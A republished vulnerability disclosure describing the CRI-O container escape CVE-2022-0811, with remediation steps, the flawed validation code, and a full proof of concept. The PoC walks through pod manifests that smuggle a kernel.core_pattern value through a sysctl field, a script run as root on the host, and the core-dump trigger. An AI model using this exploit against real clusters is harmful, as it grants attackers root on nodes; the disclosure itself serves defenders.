cr8escape: New Vulnerability in CRI-O Container Engine Discovered by CrowdStrike (CVE-2022-0811)
Published 06/03/2022
This blog was originally published by CrowdStrike on March 15, 2022.
Written by John Walker – Manoj Ahuje, CrowdStrike.
- CrowdStrike cloud security researchers discovered a new vulnerability (dubbed “cr8escape” and tracked as CVE-2022-0811) in the Kubernetes container engine CRI-O.
- CrowdStrike disclosed the vulnerability to Kubernetes, which worked with CRI-O to issue a patch that was released today.
- It is recommended that CRI-O users patch immediately.
Summary
CrowdStrike’s Cloud Threat Research team discovered a new vulnerability (CVE-2022-0811) in CRI-O (a container runtime engine underpinning Kubernetes). Dubbed “cr8escape,” when invoked, an attacker could escape from a Kubernetes container and gain root access to the host and be able to move anywhere in the cluster. Invocation of CVE-2022-0811 can allow an attacker to perform a variety of actions on objectives, including execution of malware, exfiltration of data and lateral movement across pods.
CrowdStrike disclosed the vulnerability to Kubernetes, which worked with CRI-O to issue a patch that was released today. The CVE score is 8.8 (High) and the potential impact is widespread, as many software and platforms use CRI-O by default. It is recommended that CRI-O users patch immediately.
Kubernetes uses a container runtime like CRI-O or Docker to safely share each node’s kernel and resources with the various containerized applications running on it. The Linux kernel accepts runtime parameters that control its behavior. Some parameters are namespaced and can therefore be set in a single container without impacting the system at large. Kubernetes and the container runtimes it drives allow pods to update these “safe” kernel settings while blocking access to others.
CrowdStrike’s Cloud Threat Research team discovered a flaw introduced in CRI-O version 1.19 that allows an attacker to bypass these safeguards and set arbitrary kernel parameters on the host. As a result of CVE-2022-0811, anyone with rights to deploy a pod on a Kubernetes cluster that uses the CRI-O runtime can abuse the “kernel.core_pattern” parameter to achieve container escape and arbitrary code execution as root on any node in the cluster.
Impact
Directly Affected Software
- CRI-O version 1.19+
To determine if a host is affected: run crio —version
Indirectly Affected Software and Platforms
While the vulnerability is in CRI-O, software and platforms that depend on it are also likely to be vulnerable, including:
- OpenShift 4+
- Oracle Container Engine for Kubernetes
Remediation
At the Kubernetes level:
- Ideal: Use policies to block pods that contain sysctl settings with “+” or “=” in their value.
- Less ideal alternative: Use the PodSecurityPolicy forbiddenSysctls field to block all sysctls (it’s necessary to block all sysctls as the malicious setting is smuggled in a value).
At the CRI-O level:
- Upgrade to a patched version of CRI-O.
- Set pinns_path in crio.conf to point to a pinns wrapper that strips the “-s” option before invoking the real pinns. This will prevent pods from updating any kernel parameters, including sensitive ones.
- Pinns, typically found at /usr/bin/pinns, is the utility CRI-O uses to set kernel parameters.
- Downgrade to CRI-O version 1.18 or earlier. (Not recommended in most cases.)
Vulnerability Details
Starting with this commit, CRI-O uses the pinns utility to set kernel options for a pod. Pinns is most commonly invoked like this:
pinns -s kernel_parameter1=value1+kernel_parameter2=value2
Due to the addition of sysctl support in version 1.19, pinns will now blindly set any kernel parameters it’s passed without validation.
The following function converts the map of sysctl settings passed to CRI-O into a pinns argument. Like pinns, it does not validate the settings.
func getSysctlForPinns(sysctls map[string]string) string { // this assumes there's no sysctl with a `+` in it const pinnsSysctlDelim = "+" g := new(bytes.Buffer) for key, value := range sysctls { fmt.Fprintf(g, "'%s=%s'%s", key, value, pinnsSysctlDelim) } return strings.TrimSuffix(g.String(), pinnsSysctlDelim) }
Validation does occur before this function is invoked. However, note that the value is not checked or sanitized. As long as the sysctl key is valid, it will be processed as is.
func (s *Sysctl) Validate(hostNet, hostIPC bool) error { nsErrorFmt := "%q not allowed with host %s enabled" if ns, found := namespaces[s.Key()]; found { if ns == IpcNamespace && hostIPC { return errors.Errorf(nsErrorFmt, s.Key(), ns) } return nil } for p, ns := range prefixNamespaces { if strings.HasPrefix(s.Key(), p) { if ns == IpcNamespace && hostIPC { return errors.Errorf(nsErrorFmt, s.Key(), ns) } if ns == NetNamespace && hostNet { return errors.Errorf(nsErrorFmt, s.Key(), ns) } return nil } } return errors.Errorf("%s not whitelisted", s.Key()) }
The result: A malicious user can pass in sysctl values with + and = characters allowing extra kernel settings to be set through pinns.
Proof of Concept: Leveraging CVE-2022-0811 to Compromise Kubernetes
Overview
This proof of concept (POC) uses a malicious PodSpec to set the kernel.core_pattern kernel parameter, which specifies how the kernel should react to a core dump. In this case, we’ll tell it to execute a binary hosted in another pod. That binary will be run as root outside of any container. Finally, we’ll trigger a core dump causing the kernel to invoke the malicious executable.
Reproduction Environment for POC
- Minikube cluster created via minikube start --kubernetes-version=v1.23.3 --driver=vmware --container-runtime=crio running:
- Kubernetes v1.23.3
- CRI-O 1.22.0 (Later versions are vulnerable as well; this just happens to be the version of CRI-O Minikube installs.)
Steps
Startup Pod to Host Malicious Executable
This pod will host an executable that the kernel will invoke after a core dump. It will also be used to trigger a core dump.
❯ cat ./malicious-script-host.yaml apiVersion: v1 kind: Pod metadata: name: malicious-script-host spec: containers: - name: alpine image: alpine:latest command: ["tail", "-f", "/dev/null"] ❯ kubectl create -f ./malicious-script-host.yaml pod/malicious-script-host created
Determine Root Path From Host Mount Namespace
Ultimately the kernel will be invoking a script in this pod in response to a core dump. The kernel will be acting in the host mount namespace, so we need to determine the path to the container filesystem from this namespace.
❯ kubectl exec -it malicious-script-host -- /bin/sh / # mount overlay on / type overlay (rw,relatime,lowerdir=/var/lib/containers/storage/overlay/l/VSOA5NIR3Y3ACHBH662FOSL4J2, upperdir=/var/lib/containers/storage/overlay/3ef1281bce79865599f673b476957be73f994d17c15109d2b6a426711cf753e6/ diff,workdir=/var/lib/containers/storage/overlay/3ef1281bce79865599f673b476957be73f994d17c15109d2b6a426711cf753e6/work) …
/var/lib/containers/storage/overlay/3ef1281bce79865599f673b476957be73f994d17c15109d2b6a426711cf753e6/diff is the path to the root of the container from the perspective of the kernel.
Create a Malicious Script to Invoke on Core Dump
Within our malicious script host pod:
/ # ls -l /malicious.sh -rwxr-xr-x 1 root root 256 Feb 23 14:00 /malicious.sh / # cat /malicious.sh #!/bin/sh date >> /var/lib/containers/storage/overlay/3ef1281bce79865599f673b476957be73f994d17c15109d2b6a426711cf753e6/diff/output whoami >> /var/lib/containers/storage/overlay/3ef1281bce79865599f673b476957be73f994d17c15109d2b6a426711cf753e6/diff/output hostname >> /var/lib/containers/storage/overlay/3ef1281bce79865599f673b476957be73f994d17c15109d2b6a426711cf753e6/diff/output # important – ensures file is readable within container / # touch /output / # cat /output
We now have a malicious script setup and we know its path in the host mount namespace.
Use Second Pod to Point Core Pattern to Malicious Script
Next is our attempt to create a second pod. Creation will stall, but as a result of the attempt, CRI-O daemon will update the value of the kernel.core_pattern setting, which controls what the kernel does in response to core dumps. In this case, we’ll tell the kernel to send the core dump to our malicious script.
NOTE: You must ensure this pod runs on the same node as the malicious script pod. There are multiple ways to do this depending on the exact cluster setup. A primitive, brute force method is to spin it up as a daemonset, which will update core_pattern for every node in the cluster.
❯ cat ./sysctl-set.yaml apiVersion: v1 kind: Pod metadata: name: sysctl-set spec: securityContext: sysctls: - name: kernel.shm_rmid_forced value: "1+kernel.core_pattern=|/var/lib/containers/storage/overlay/ 3ef1281bce79865599f673b476957be73f994d17c15109d2b6a426711cf753e6/diff/malicious.sh #" containers: - name: alpine image: alpine:latest command: ["tail", "-f", "/dev/null"] ❯ kubectl create -f ./sysctl-set.yaml pod/sysctl-set created ❯ kubectl get pods NAME READY STATUS RESTARTS AGE malicious-script-host 1/1 Running 0 14m sysctl-set 0/1 ContainerCreating 0 68s ❯ kubectl exec -it malicious-script-host -- /bin/sh / # cat /proc/sys/kernel/core_pattern |/var/lib/containers/storage/overlay/3ef1281bce79865599f673b476957be73f994d17c15109d2b6a426711cf753e6/diff/malicious.sh #'
While the sysctl-set pod did not start, it successfully updated the node-wide core_pattern to point into our malicious-script-host container.
This works because both Kubernetes and CRI-O sysctl validation logic believe the user is updating only the safe kernel parameter “kernel.shm_rmid_forced.” When CRI-O actually applies this setting, though, its parser will expand it into two kernel parameter updates:
kernel.shm_rmid_forced=1
kernel.core_pattern=|<path to malicious script> #’
This second option has not been validated or sanitized in any way. (NOTE: The trailing # is to ignore the single quote CRI-O adds to the end of the value.)
Trigger Core Dump
We need to trigger a core dump to cause the kernel to execute our malicious core dump handler.
First enable core dumps:
❯ kubectl exec -it malicious-script-host -- /bin/sh / # ulimit -c unlimited / # ulimit -c unlimited
Now trigger one:
/ # tail -f /dev/null & / # ps PID USER TIME COMMAND 1 root 0:00 tail -f /dev/null 34 root 0:00 /bin/sh 42 root 0:00 tail -f /dev/null 43 root 0:00 ps / # kill -SIGSEGV 42 / # [1]+ Segmentation fault (core dumped) tail -f /dev/null
Verify Malicious Script Ran
❯ kubectl exec -it malicious-script-host -- /bin/sh / # cat /output Wed Feb 23 14:20:07 UTC 2022 root minikube
This script was invoked by the kernel outside of the container namespace with root privileges. A real attacker could, as an example, run a reverse shell and gain full control of the node.
Notes
Kubernetes is not necessary to invoke CVE-2022-8011. An attacker on a machine with CRI-O installed can use it to set kernel parameters all by itself. We used Kubernetes in this POC to better illustrate the potential impact of the problem and to more closely simulate how this would likely be used in the wild.
Read more about how to block vulnerabilities before they’re exploited: How to Protect Cloud Workloads from Zero-day Vulnerabilities
Related Articles:
A Vulnerability Management Crisis: The Issues with CVE
Published: 11/21/2024
Democracy at Risk: How AI is Used to Manipulate Election Campaigns
Published: 10/28/2024
File-Sharing Fraud: Data Reveals 350% Increase in Hard-to-Detect Phishing Trend
Published: 10/21/2024